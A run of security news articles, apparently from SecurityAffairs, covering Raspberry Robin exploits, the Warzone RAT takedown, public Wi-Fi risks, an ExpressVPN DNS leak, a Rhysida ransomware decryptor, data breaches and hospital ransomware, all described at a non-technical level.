Raspberry Robin continues to evolve, it was spotted using two new one-day exploits for vulnerabilities either Discord to host samples. 

Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary, the malware propagates through removable USB devices.

The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL. The malware uses TOR exit nodes as a backup C2 infrastructure.

The malware was first spotted in September 2021, the experts observed it targeting organizations in the technology and manufacturing industries. Initial access is typically through infected removable drives, often USB devices.

The malware uses cmd.exe to read and execute a file stored on the infected external drive, it leverages msiexec.exe for external network communication to a rogue domain used as C2 to download and install a DLL library file.

Checkpoint researchers now detailed the evolution of the threat, Raspberry Robin authors integrated two new 1-day LPE (local privilege escalation) zero-day exploits. The experts believe that the operators have access to an exploit seller or the malware authors have developed the exploits.

The researchers noticed that Raspberry Robin is continually updated with new features and supports new evasion capabilities.

The malicious code also changed its communication method and lateral movement to avoid detection.

Raspberry Robin is now spreading by disguising itself as a legitimate Windows component.

“Since last October, we have seen large waves of attacks against our customers worldwide. Since our last report, it is clear that Raspberry Robin hasn’t stopped implementing new features and tricks that make it even harder to analyze.” reads the report published by Checkpoint. “Most importantly, Raspberry Robin continues to use different exploits for vulnerabilities either before or only a short time after they were publicly disclosed. Those 1-day exploits were not publicly disclosed at the time of their use. An exploit for one of the vulnerabilities, CVE-2023-36802, was also used in the wild as a 0-day and was sold on the Dark Web.”

The vulnerability CVE-2023-36802 is a Type Confusion issue in Microsoft Streaming Service Proxy. A local attacker can exploit the flaw to escalate privileges to SYSTEM (Local Privilege Escalation). The vulnerability is triggered when one of the following IOCTLs.

The vulnerability was disclosed on September 12, but researchers reported it had been exploited in the wild for some time before becoming a zero-day. Researchers from cybersecurity Cyfirma reported that an exploit for CVE-2023-36802 was available for sale on Dark Web forums in February 2023, while Microsoft and CISA warned about its exploitation in September.

Raspberry Robin started using an exploit for CVE-2023-36802 in October 2023. In 2023: Valentina Palmiotti published details of CVE-2023-36802 and its exploitation.

The analysis of the samples before October, revealed that the operators also used an exploit for CVE-2023-29360. The exploit for the vulnerability CVE-2023-29360 was publicly disclosed in June, and Raspberry Robin employed it in August.

“Even though this is a pretty easy vulnerability to exploit, the fact that the exploit writer had a working sample before there was a known exploit in GitHub is impressive as is how quickly Raspberry Robin used it.” continues the report.

The researchers conclude that Raspberry Robin operators have purchased the 1-day exploits from an exploit developer for the following reasons:

• “The exploits are used as an external 64-bit executable. If the Raspberry Robin authors were the developers of the exploits, then they would have probably used the exploits in the main component itself. In addition, the exploits would be packed in the same way and have the same format as the different stages of the main component.“
• The exploits are only available for 64-bit.
• The exploits are not heavily obfuscated and don’t have Control flow flattening and variable masking as in Raspberry Robin’s main component.

The report includes Indicators of Compromise (IoCs) for this threat.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, malware)

The U.S. Justice Department (DoJ) seized the infrastructure that was used to sell the remote access trojan (RAT) Warzone RAT.

The Justice Department announced the seizure of internet domains used to sell the remote access Trojan Warzone RAT (www.warzone[.]ws).

The seizure is the result of an international law enforcement operation, federal authorities in Atlanta and Boston charged individuals in Malta and Nigeria, for their involvement in selling the malware.

According to court documents, the FBI covertly purchased and analyzed the Warzone RAT.

“Federal authorities in Boston seized www.warzone.ws and three related domains, which together offered for sale the Warzone RAT malware — a sophisticated remote access trojan (RAT) capable of enabling cybercriminals to surreptitiously connect to victims’ computers for malicious purposes.” reads the press release published by DoJ. “According to court documents authorizing the seizures, the Warzone RAT provided cybercriminals the ability to browse victim file systems, take screenshots, record keystrokes, steal victim usernames and passwords, and watch victims through their web cameras, all without the victims’ knowledge or permission.”

Investigations conducted by the US authorities led to two indictments against two men, Daniel Meli (27) and Prince Onyeoziri Odinakachi (31).

The two individuals are charged with selling and supporting the Warzone RAT and other malware.

Meli allegedly provided cybercriminals with malware products and services via online hacking forums. He is suspected of aiding cybercriminals in deploying Remote Access Trojans (RATs) for malicious purposes and selling instructional tools, including an eBook. Meli sold the Warzone RAT and, previously, the Pegasus RAT, distributed through the criminal organization Skynet-Corporation. Furthermore, he allegedly offered customer support to buyers of both RATs.

Meli offered malware products and services for sale to cybercriminals through online computer-hacking forums. Specifically, Meli allegedly assisted cybercriminals seeking to use RATs for malicious purposes and offered teaching tools for sale, including an eBook. Meli also allegedly sold both the Warzone RAT and, before that, malware known as the Pegasus RAT, which he sold through an online criminal organization called Skynet-Corporation. The man also provided online customer support to purchasers of both RATs.

The second man, Prince Onyeoziri Odinakachi, from Nigeria, was indicted by a federal grand jury in the District of Massachusetts on January 30. He is accused of conspiracy to commit various cybercrimes, such as gaining authorized access to protected computers and causing unauthorized damage to protected computers. Between June 2019 and March 2023, Odinakachi provided online customer support to individuals who purchased and utilized the Warzone RAT malware.

The two individuals were arrested on February 7, 2024.

“The charges of conspiracy, obtaining authorized access to protected computers to obtain information, illegally selling an interception device, and illegally advertising an interception device each provide for a sentence of up to five years in prison, three years of supervised release and a fine of $250,000, or twice the gross gain or loss, whichever is greater.” concludes DoJ. “The charge of causing unauthorized damage to protected computers provides for a sentence of up to 10 years in prison, three years of supervised release, and a fine of $250,000, or twice the gross gain or loss, whichever is greater.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, malware)

Exploring the Risks: Unveiling 9 Potential Techniques Hackers Employ to Exploit Public Wi-Fi and Compromise Your Sensitive Data

We’ve all used public Wi-Fi: it’s convenient, saves our data, and speeds up browsing. But while we enjoy its benefits, hackers do too. Here, we’ll explore how cybercriminals exploit public Wi-Fi to access your private data and possibly steal your identity. Plus, we’ll discuss ways to protect yourself when using public Wi-Fi, even when you have no other option.

1.   Man-in-the-Middle Attacks (MITM)

When a hacker intercepts communication between two parties, it’s called a Man-in-the-Middle (MITM) attack. Instead of data going directly between you and the server, the hacker sneaks in and can even show you their own version of a website, including fake messages.

Public Wi-Fi users are prime targets for MITM attacks because the information they send is often not encrypted, meaning it’s easy for hackers to access your data. Once they’re in, they can grab your emails, usernames, passwords, and more. They might even lock you out of your own accounts by resetting your passwords.

Look for the “https” in the website’s URL—it means there’s some level of encryption. Avoid entering any data if you see a warning message about a site’s authenticity. Most browsers will alert you if a site isn’t secure.

2.   Fake Wi-Fi Connections

Also known as the “Evil Twin,” this type of attack tricks you into joining a fake Wi-Fi network set up by a hacker. They can then intercept all the data you send over that network, without you even realizing it.

Creating a fake Wi-Fi network is surprisingly easy for cybercriminals, and they often do it near genuine hotspots to lure in unsuspecting victims.

Be cautious if you see two Wi-Fi networks with similar names. If you’re unsure, ask the staff at the place where you’re connecting to Wi-Fi. Also, consider using a Virtual Private Network (VPN) to encrypt your data and make it unreadable to hackers.

3.   Packet Sniffing

This method allows hackers to capture data packets flying through unencrypted networks and analyze them at their leisure. Packet sniffing isn’t always illegal – IT departments use it to maintain security but it’s also a favorite tool for cybercriminals looking to steal passwords and other sensitive information.

Invest in a VPN to encrypt your data and ensure websites you use have SSL/TSL certificates (look for “https” in the URL).

4.   Sidejacking (Session Hijacking)

Sidejacking or Session Hijacking is like packet sniffing in real-time. Hackers use intercepted data to hijack your current session on a website, giving them access to your private accounts and information.

While they can’t directly read your password, they can still download malware or gather enough information to steal your identity.

Use a VPN to encrypt your data and always log out of your accounts when you’re finished using them, especially on public Wi-Fi. Check your social media accounts for active sessions and log out of any you don’t recognize.

5.   Shoulder-Surfing

Sometimes, the simplest scams are the most effective. Shoulder-surfing involves someone watching over your shoulder as you type in passwords or other personal information.

Be aware of your surroundings and who might be watching you. If you’re unsure, avoid entering sensitive information or use a privacy screen to block prying eyes.

6.   DNS Spoofing

DNS (Domain Name System) is like the internet’s phone book, translating domain names into IP addresses. Hackers can manipulate DNS settings to redirect your internet traffic to malicious websites, even if you entered the correct web address.

Consider using a reputable DNS service or a VPN that offers DNS encryption to prevent your traffic from being redirected.

7.   Wi-Fi Phishing

Similar to email phishing scams, Wi-Fi phishing involves setting up fake Wi-Fi networks that mimic legitimate ones. When users connect to these networks, hackers can intercept their data or trick them into entering sensitive information.

Always verify the authenticity of Wi-Fi networks before connecting, especially in public places. Avoid connecting to networks with generic names like “Free Wi-Fi” and be cautious of any network that requires you to input personal information to connect.

8.   Rogue Access Points

Hackers can set up their own wireless access points in public spaces, posing as legitimate hotspots. Once connected, they can monitor and capture users’ data or launch attacks on their devices.

Use a VPN to encrypt your internet traffic and avoid connecting to unfamiliar Wi-Fi networks. If you’re unsure about a network’s legitimacy, ask an employee or look for signage indicating the official Wi-Fi network.

9.   Keyloggers

Keyloggers are malicious software or hardware devices that record keystrokes on a computer or mobile device. If a hacker manages to install a keylogger on a public computer or compromised device, they can capture usernames, passwords, and other sensitive information entered by users.

Avoid using public computers for sensitive activities like online banking or entering passwords. If you must use a public computer, consider using a virtual keyboard or typing sensitive information in a secure document and then copying and pasting it into the intended fields.

Wrapping Up

In conclusion, while public Wi-Fi offers convenience and connectivity, it also presents numerous security risks. Hackers employ various tactics such as man-in-the-middle attacks, fake Wi-Fi connections, and packet sniffing to steal sensitive data from unsuspecting users. It’s essential to consider a VPN as it can provide an extra level of security to your online activities, especially when you’re using public Wi-Fi or handling sensitive information. When you change your virtual location on an iPhone, computer, or any other device and hide your real IP address, you can protect yourself from potential security threats.

However, by implementing security measures like using VPNs, verifying Wi-Fi network authenticity, and practicing vigilance against common threats, individuals can safeguard their personal information and minimize the risks associated with using public Wi-Fi. It’s crucial to remain vigilant and take proactive steps to protect oneself in an increasingly interconnected digital world.

About Author: Anas Baig

With a passion for working on disruptive products, Anas Baig is currently working as a Product Manager at the Silicon Valley based company – Securiti.ai. He holds a degree of Computer Science from Iqra University and specializes in Information Security & Data Privacy.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Public Wi-Fi)

A bug in the split tunneling feature implemented in ExpressVPN exposed the domains visited by the users.

ExpressVPN addressed a bug in the split tunneling feature that exposed the domains visited by the users to configured DNS servers.

The company opted to temporarily remove the feature in the Windows app to address the issue. The bug will be enabled in a future release when the company will fix it.

The issue was introduced in ExpressVPN Windows versions 12.23.1 – 12.72.0 from May 19, 2022, it was fixed with the release of Version 12 app for Windows.

The issue was discovered by Attila Tomaschek, a VPN expert and staff writer at the tech publication CNET. Tomaschek noticed that DNS requests on his Windows machine weren’t being directed to ExpressVPN’s dedicated servers when he had activated the split tunneling feature, which is used to limit which apps send their traffic through the VPN. The expert noticed that the DNS queries were sent to the DNS server configured on the computer.

“When a user is connected to ExpressVPN, their DNS requests are supposed to be sent to an ExpressVPN server. But the bug allowed some of those requests to go instead to a third-party server, which in most cases would be the user’s internet service provider or ISP.” reads the advisory. “This lets the ISP see what domains are being visited by that user, such as google.com, although the ISP still can’t see any individual webpages, searches, or other online behavior. All contents of the user’s online traffic remain encrypted and unviewable by the ISP or any other third party.”

The advisory published by the company states that the issue is believed to impact less than 1% of users on a single app platform, Version 12 for Windows. The company also announced an investigation into the bug.

“We were only able to replicate the issue when using the specific split tunneling mode “Only allow selected apps to use the VPN,” and even then, we found that it only occurred in some cases. In our testing, users who had not activated split tunneling at all, or who had chosen the other mode, “Do not allow selected apps to use the VPN,” had their DNS requests handled properly. No other VPN protections, such as encryption, were affected.” reads the advisory. 

Anyway, disabling the split tunneling feature will prevent the leak of the DNS requests.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, ExpressVPN)

The Canadian government is going to ban the tool Flipper Zero because it is abused by crooks to steal vehicles in the country.

The Canadian government announced that it plans to ban the tool Flipper Zero, and similar hacking devices, to curb the surge in car thefts.

Flipper Zero is a portable multi-tool for pentesters and geeks in a toy-like body. It allows hacking digital stuff, such as radio protocols, access control systems, hardware, and more, reads the official website. The tool is fully open-source and customizable, so you can extend it in whatever way you like.

Car thieves can use the tool to carry out replay attacks that can unlock the vehicles.

“Auto theft is a problem the government can’t tackle alone.” said Canadian Industry Minister François-Philippe Champagne. “Criminals have been using sophisticated tools to steal cars. And Canadians are rightfully worried.   Today, I announced we are banning the importation, sale and use of consumer hacking devices, like flippers, used to commit these crimes.”

Criminals have been using sophisticated tools to steal cars. And Canadians are rightfully worried.
 
Today, I announced we are banning the importation, sale and use of consumer hacking devices, like flippers, used to commit these crimes.

: https://t.co/K4MA3u68kP

— François-Philippe Champagne (FPC) (@FP_Champagne) February 8, 2024

In Canada, the authorities estimated that 90,000 vehicles are stolen, equating to one car stolen every six minutes. Beyond the social implications, auto theft imposes significant economic burdens on Canadian car owners, resulting in approximately $1 billion in annual losses. This includes substantial costs for insurers, reaching an estimated $542 million annually, to repair or replace stolen vehicles.

“As a participant in the National Summit on Combatting Auto Theft, we recognize the need to coordinate and enhance efforts to combat auto theft in Canada, with a particular focus on regions that are being disproportionately impacted.” reads the Statement of Intent on Combatting Auto Theft published by the Canadian Government. “We recognize that combatting auto theft is complex, consisting of many points of possible deterrence and intervention including prevention, detection, enforcement and recovery.”

Innovation, Science and Economic Development Canada will work with Canadian companies, and the automotive industry, to develop new solutions to protect vehicles against theft and to assist with recovery of stolen vehicles.

The Canadian government’s Innovation, Science and Economic Development (ISED) is focused on banning any tool that can be abused to steal cars.

“ISED will pursue all avenues to ban devices used to steal vehicles by copying the wireless signals for remote keyless entry, such as the Flipper Zero, which would allow for the removal of those devices from the Canadian marketplace through collaboration with law enforcement agencies.” reads a statement from the Canadian Government.

Flipper Zero denied the use of their tool to steal vehicles.

“We’d appreciate it if you could provide any evidence of Flipper Zero being involved in any criminal activities of this kind. We’re not aware of any events like this and frankly speaking not sure what was the reason for this discussion to begin with.” reads a message published by the company on X.

Dear François-Philippe,

We'd appreciate it if you could provide any evidence of Flipper Zero being involved in any criminal activities of this kind. We're not aware of any events like this and frankly speaking not sure what was the reason for this discussion to begin with.

— Flipper Zero (@flipper_zero) February 9, 2024

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, Flipper Zero)

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Roundcube Webmail Persistent Cross-Site Scripting (XSS) Vulnerability to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Roundcube Webmail Persistent Cross-Site Scripting (XSS) vulnerability, tracked as CVE-2023-43770, to its Known Exploited Vulnerabilities (KEV) catalog.

Roundcube is an open-source web-based email client. It provides a user-friendly interface for accessing email accounts via a web browser. Users can send and receive emails, manage their contacts, organize messages into folders, and perform various other email-related tasks. Roundcube supports standard email protocols such as IMAP and SMTP, making it compatible with a wide range of email servers.

The exploitation of the vulnerability can lead to information disclosure via malicious link references in plain/text messages.

The vulnerability was discovered by Niraj Shivtarka, it impacts Roundcube before 1.4.14, 1.5.x before 1.5.4, and 1.6.x before 1.6.3. The vulnerability was fixed with the release of version 1.6.3.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix this vulnerability by March 4, 2024.

In October, Russia-linked APT group Winter Vivern (aka TA473) was observed exploiting another zero-day flaw in Roundcube webmail software.

ESET researchers pointed out that is a different vulnerability than CVE-2020-35730, that the group exploited in other attacks.

ESET reported the zero-day to Roundcube, and the company patched the issue on October 14^th, 2023. The vulnerability affects Roundcube versions 1.6.x before 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, Known Exploited Vulnerabilities catalog)

Researchers discovered a vulnerability in the code of the Rhysida ransomware that allowed them to develop a decryption tool.

Cybersecurity researchers from Kookmin University and the Korea Internet and Security Agency (KISA) discovered an implementation vulnerability in the source code of the Rhysida ransomware.

The experts exploited the vulnerability to reconstruct encryption keys and developed a decryptor that allows victims of the Rhysida ransomware to recover their encrypted data for free.

“This study examines Rhysida ransomware, which caused significant damage in the second half of 2023, and proposes a decryption method. Rhysida ransomware employed a secure random number generator to generate the encryption key and subsequently encrypt the data. However, an implementation vulnerability existed that enabled us to regenerate the internal state of the random number generator at the time of infection.” reads the paper published by the researchers “We successfully decrypted the data using the regenerated random number generator. To the best of our knowledge, this is the first successful decryption of Rhysida ransomware.”

The implementation vulnerability resides in the encryption scheme implemented by the ransomware, specifically, the random number generator (CSPRNG).

The CSPRNG is used to generate the encryption key, which is unique for each attack.

“The random number generator takes a seed as input, sets it as the initial internal state, and generates a sequence of random numbers according to a defined rule. Therefore, if we can identify the initial internal state, regenerating the random number becomes feasible.” reads the paper.

By exploiting the flaw, the researchers demonstrated that is possible to recover the internal state of CSPRNG and use it to create a key to decrypt the data.

The Rhysida ransomware uses CSPRNG, which is based on the ChaCha20 algorithm provided by the LibTomCrypt library.

The researchers noticed that the random number generated by the CSPRNG is based on the execution time of the ransomware. The time value used as a seed is 32-bit data, which implies that the number of possible cases of CSPRNG is up to 2^32.”

The experts also discovered that the ransomware manages a list of files that it is going to encrypt. The ransomware uses various concurrent threads that encrypt the files in a specific order.

“In the encryption process of the Rhysida ransomware, the encryption thread generates 80 bytes of random numbers when encrypting a single file. Of these, the first 48 bytes are used as the encryption key and the Initial Vector.” continues the paper.

Based on these observations, the researchers successfully obtained the initial seed for decrypting the ransomware, identified the order used to encrypt the files, and ultimately restored the data without paying any ransom.

“By exploiting these vulnerabilities, we managed to reconstruct the encryption key and recover the encrypted system. This challenges the common belief that ransomware makes data irretrievable without fulfilling the ransom demand. While these findings are based on a limited scope, it is crucial to recognize that certain ransomwares, as demonstrated in this paper, can indeed be successfully decrypted.” concludes the paper.

The Rhysida ransomware group has been active since May 2023. According to the gang’s Tor leak site, at least 62 companies are victims of the operation.

The ransomware gang hit organizations in multiple industries, including the education, healthcare, manufacturing, information technology, and government sectors. The victims of the group are “targets of opportunity.”

In December 2023, FBI and CISA published a joint Cybersecurity Advisory (CSA) to warn of Rhysida ransomware attacks. The advisory is part of the ongoing #StopRansomware effort, disseminating information about tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with ransomware groups.

The report includes IOCs and TTPs identified through investigations as recently as September 2023.

Rhysida actors leverage external-facing remote services (e.g. VPNs, RDPs) to gain initial access to the target network and maintain persistence. The group relied on compromised credentials to authenticate to internal VPN access points. According to the advisory, the threat actors have exploited Zerologon (CVE-2020-1472) in Microsoft’s Netlogon Remote Protocol in phishing attempts.

The group relies on living off-the-land techniques such as native (built into the operating system) network administration tools to perform malicious operations.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, ransomware)

Residential Proxies vs. Datacenter Proxies: this blog post examines the contours of each type and provides info on how to choose the perfect proxy option

In the robust landscape of the digital era, our need for privacy, security, and accessibility on the internet has never been more acute. Whether it’s for gathering market intelligence, ensuring your privacy, or bypassing geographical restrictions, proxies have become the unsung heroes for individuals and enterprises alike. But when it’s time to pick the right proxy for your needs, you might find yourself at a crossroads between residential and datacenter proxies. Let’s embark on a journey to discover the contours of each type and traverse the path to choosing the perfect proxy option for you.

Proxies serve as intermediaries between you and the internet, a kind of digital masquerade that conceals your IP address, lending you another. Imagine walking into a virtual masquerade ball; the mask you choose—whether the suave residential or the discrete datacenter—determines how you interact with other guests (websites) and how hosts (servers) perceive you.

Understanding the Difference Between Residential and Datacenter Proxies

At the heart of this decision is understanding the two main contestants: residential proxies and datacenter proxies.

Residential Proxies: The Noble Disguise Residential proxies are like the knights in shining armour of the proxy world; they come with legitimate, ISP-issued IP addresses that trace back to an actual device in a real location. These proxies give you the appearance of a genuine user, blending in with the crowd seamlessly. They’re exceptionally useful for tasks that require a high level of legitimacy and are less likely to be blocked or banned, making them ideal for sensitive operations like web scraping, ad verification, and accessing geo-restricted content.

Imagine you’re doing market research and you need access to local pricing across different regions. Residential proxies ensure that your requests are seen as coming from a resident of the target location. In this guise, websites are much more hospitable, allowing you uninhibited access to the data that is usually hidden from outsiders.

Datacenter Proxies: The Efficient Masquerade In contrast, datacenter proxies are the mavericks of the proxy world. They’re not affiliated with any ISP and don’t correspond to a particular residential address. Instead, they’re housed in data centres around the globe, providing you with a non-residential IP address. Their strength lies in speed and cost-effectiveness, making them perfect for tasks that require swift execution, like brand protection or bulk account creation.

Due to their nature, datacenter proxies can raise red flags for some websites, leading to a higher chance of being blocked if used recklessly. However, with proper rotation and usage, they can offer a speedy solution for your internet endeavours without the higher price tag of their residential counterparts.

So, how do you choose between the knight and the maverick? It really boils down to your specific needs.

The Case for Residential Proxies Residential proxies are your go-to for high-stake tasks that necessitate undisputed legitimacy. If you’re managing social media accounts for influencer marketing or performing competitor analysis, residential proxies provide the reliability you need. They’re less likely to get blocked or blacklisted, offering you a sustainable solution for long-term operations.

Consider a brand that needs to ensure its advertisements are appearing properly across different regions. Residential proxies can facilitate the process by enabling the brand to see what their ads look like from various locations around the globe.

The Argument for Datacenter Proxies But what if your task is more about straightforward functionality than cloak-and-dagger finesse? Datacenter proxies have you covered. With their swift connectivity and lower costs, they gleam with the allure of efficiency. They’re particularly well-suited for situations where you need a large number of IPs at your disposal or when you’re executing tasks that are less sensitive to the authenticity of your IP address.

Imagine a scenario where you’re validating the integrity of your website by performing numerous stress tests. In this case, datacenter proxies provide the anonymity and variation required without the added cost of residential IPs.

The beauty lies in the balance. Some prefer the chivalrous assurance of residential proxies, while others opt for the cost-effective agility of datacenter proxies. Also, it’s worth noting that advancements in technology have introduced rotating proxies—a service like GoProxies promises to offer the best of both worlds. It combines the stealth of residential proxies with the efficiency of datacenter proxies, as IPs rotate, reducing the risk of detection and banning.

Choosing the Right Option Choosing between residential and datacenter proxies is no light matter and it prompts introspection into the nature of your online activities. Assess your needs, from the level of scrutiny you can withstand to the speed you require. Are you someone who needs to manoeuvre through cyberspace undetected for data scraping, or do you need the power of numbers for simpler automated tasks?

Regardless of your choice, ensure that you select a reliable proxy provider that can give you the assurance of quality and the support you need. Explore the options, ask questions, and even test out the services to find the perfect match. Your digital adventures hinge on this critical choice between residential and datacenter proxies.

In the end, no matter which mask you don, remember that your online quests deserve the most fitting digital façade. Whether it’s the robust authenticity of a residential proxy or the swift anonymity of a datacenter proxy, choose a sidekick that complements your online strategy and propels you towards your goals.

In this ever-evolving affair of digital disguises and internet sleuthing, the right proxy could mean the difference between success and setback. So choose wisely, and let this subtle but crucial cog in your internet mechanism set the stage for a safer, smarter, and more efficient online presence.

About Author: Anas Baig

With a passion for working on disruptive products, Anas Baig is currently working as a Product Manager at the Silicon Valley based company – Securiti.ai. He holds a degree of Computer Science from Iqra University and specializes in Information Security & Data Privacy.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Public Wi-Fi)

Resecurity has identified a growing trend of malicious cyber-activity targeting sovereign elections globally

With more voters than ever in history heading to the polls in 2024, Resecurity has identified a growing trend of malicious cyber-activity targeting sovereign elections globally. In an era of unprecedented geopolitical volatility, this trend is particularly concerning, as Time Magazine notes that 64 countries (plus the European Union) are set to hold national elections this year. According to Time Magazine, “2024 is not just an election year. It’s perhaps the election year.”

Collectively, some two billion eligible voters represented in these races constitute roughly 49% of the global population. For many of these voters, the results of these elections “will prove consequential for years to come,” according to Time Magazine. By far, the most significant contest this year is the U.S. presidential election, the outcome of which could radically alter the destinies of geopolitical relations and military conflicts globally.

Besides the continued targeting of the U.S. and its allies, activity observed by Resecurity between 2023 and early 2024 indicates a 100 percent increase from the previous analysis period. This assessment is based on multiple incidents that Resecurity observed and reported to relevant authorities globally in the following jurisdictions: Africa, the European Union, the United Kingdom, Ecuador, Bangladesh, Indonesia, Israel, Iraq, Turkey, and Mexico.

These types of incidents generally act as precursors for more significant malicious activity that can be further amplified by foreign interference campaigns. Besides cyberespionage, threat actors aim to sow uncertainty about the integrity of elections via operations that aim to disrupt and manipulate public opinion globally. Unfortunately, these incidents remain complicated from an investigation perspective and are often imperceptible to the public.

With the 2024 General Election rapidly approaching in the U.S., the intelligence collected about the incidents discussed in this report serves as a stark reminder that threat actors are actively trying to acquire and exploit voter data. While some of the threat actors behind these leak operations are purely motivated by profit and opportunistic hacktivism driven (by ideology), other cogs in this cybercriminal supply chain may be looking to weaponize voter data to craft targeted propaganda campaigns and subvert democracies worldwide.

Similar to the phenomenon of account compromise due to password reuse across multiple platforms, leaked voter data remains exploitable years after the initial leak.

This is one of the most crucial issues that governments should address. In the backdrop of rapidly increasing cyber-threats, ensuring comprehensive identity protection for voters has become foundational to preserving the integrity of the democratic process. Cyberespionage groups, operating under the direction of nation-state actors, are targeting voter PII, plotting to use it as a long-term weapon for electoral interference. This data reveals crucial demographic insights and context about target populations during both pre-election and post-election stages.

A detailed technical analysis of the activities targeting elections is available here:

https://www.resecurity.com/blog/article/global-malicious-activity-targeting-elections-is-skyrocketing

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, elections)

Maintainers behind the Ransomfeed platform have released Q3 Report 2023 including activities of 185 criminal groups operating worldwide.

A comprehensive report delving into the intricate landscape of ransomware threats during the last four months of 2023 is out, with a meticulous focus on the monitoring activities conducted by the OSINT Ransomfeed platform (www.ransomfeed.it). Throughout this period, the platform diligently tracked 185 criminal groups operating worldwide, meticulously tracing 342 servers employed for ransomware activities. The data collected unearthed a total of 1771 ransomware claims, with 55 recorded incidents in Italy. This report meticulously scrutinizes the geographical localization of these attacks, as well as the industries predominantly targeted.

As customary, the ensuing data, as reiterated, were procured via the primary activity of the Ransomfeed platform, involving periodic scraping from various renowned dark websites. For this report, the focus is directed toward the outcomes gathered concerning the third quarter of the past year, commencing with a global overview encompassing all monitored ransomware groups and culminating with a specific emphasis on Italy.

During this period of 2023, the platform meticulously monitored 185 cybercriminal groups operating with ransomware technologies across over 342 servers and mirrors, consequently tallying a definition of 1771 ransomware claims identified globally.

The months of May, June, July, and August each presented unique challenges in the realm of cybersecurity. Remarkably, December emerged as the most prolific month of the four months with 484 attacks, closely trailed by November with 482, September with 458, and October with 347. Notably, the year’s end witnessed an escalation in criminal claims, almost akin to concluding a productive year. Let us now delve into the detailed breakdown of the days.

This report offers an exhaustive account of ransomware threats in the third quarter of 2023, spotlighting activities monitored by the OSINT Ransomfeed platform.

In conclusion, the report underscores the paramount importance of international collaboration and the adoption of advanced defense strategies to effectively counter the burgeoning phenomenon of ransomware threats and safeguard the integrity of data and information systems.

Ransomfeed trusts this report (results of no-profit activity) will serve as a vital resource for cybersecurity professionals, researchers, and stakeholders alike, providing valuable insights into the evolving ransomware landscape and paving the way for robust defense mechanisms against such malicious activities.

The complete report is available here:

https://ransomfeed.it/data/reports/2023/DRM-Report-Q3-2023-%5BENG%5D.pdf

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, ransomware)

Bank of America revealed that the personal information of some customers was stolen in a data breach affecting a third-party services provider.

Bank of America began notifying some customers following a data breach at the third-party services provider Infosys McCamish System (IMS). The bank has sent notification letters to 57,000 customers, informing them that their personal information has been compromised

Infosys disclosed the security breach on November 3, 2023, in a filing with SEC the company reported it was the victim of a cyberattack that resulted in the non-availability of certain applications and systems.

McCamish immediately launched an investigation into the incident and worked on the remediation with the help of cybersecurity consultants.

The effects of the cyberattack described by the victim suggest it was targeted by a ransomware attack. On November 4, the LockBit ransomware gang claimed responsibility for the attack.

The company restored the impacted systems by December 31, it also estimated the losses caused by the incident will be at least of $30 million.

“On the basis of analysis conducted by the cybersecurity firm, McCamish believes that certain data was exfiltrated by unauthorized third parties during the incident and this exfiltrated data included certain customer data. McCamish has engaged a third-party e- discovery vendor in assessing the extent and nature of such data. This review process is ongoing. McCamish may incur additional costs including indemnities or damages/claims, which are indeterminable at this time.” reads the statement sent to the SEC. “Infosys had previously communicated the occurence of this cybersecurity incident to BSE Limited, National Stock Exchange of India Limited, New York Stock Exchange and to United States Securities and Exchange Commission on November 3, 2023.”

On February 1, Bank of America started notifying 57028 customers impacted by the data breach.

the Maine Attorney General’s Office, Bank of America noted that it cannot determine “with certainty what personal information was accessed” during the attack.

“On or around November 3, 2023, IMS was impacted by a cybersecurity event when an unauthorized third party accessed IMS systems, resulting in the non-availability of certain IMS applications. On November 24, 2023, IMS told Bank of America that data concerning deferred compensation plans serviced by Bank of America may have been compromised. Bank of America’s systems were not compromised.” reads the letter sent to the impacted customers. “It is unlikely that we will be able to determine with certainty what personal information was accessed as a result of this incident at IMS. According to our records, deferred compensation plan information may have included your first and last name, address, business email address, date of birth, Social Security number, and other account information.”

According to the financial institution, exposed data may include first and last name, address, business email address, date of birth, Social Security number, and other account information.

Bank of America states that they are not aware of any misuse involving the compromised information, however, the bank will provide a complimentary two-year membership in an identity theft protection service provided by Experian IdentityWorks.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, Bank of America) 

Authorities in Romania reported that at least 100 hospitals went offline after a ransomware attack hit the Hipocrate platform.

Authorities in Romania confirmed that a ransomware attack that targeted the Hipocrate Information System (HIS) has disrupted operations for at least 100 hospitals.

Hipocrate Information System (HIS) is a software suite designed to manage the medical and administrative activities of hospitals and other healthcare institutions.

The attack took place on February 11 and encrypted data in the production servers.

“During the night of February 11 to 12, 2024, a massive cyber ransomware attack took place on the production servers on which the HIS IT system runs. As a result of the attack, the system is down, files and databases are encrypted.” reported the Romanian Ministry of Health.

The initial number of impacted hospitals was 21, but later the authorities confirmed that the number had increased to 25. Another 79 hospitals took their systems down as a precautionary measure.

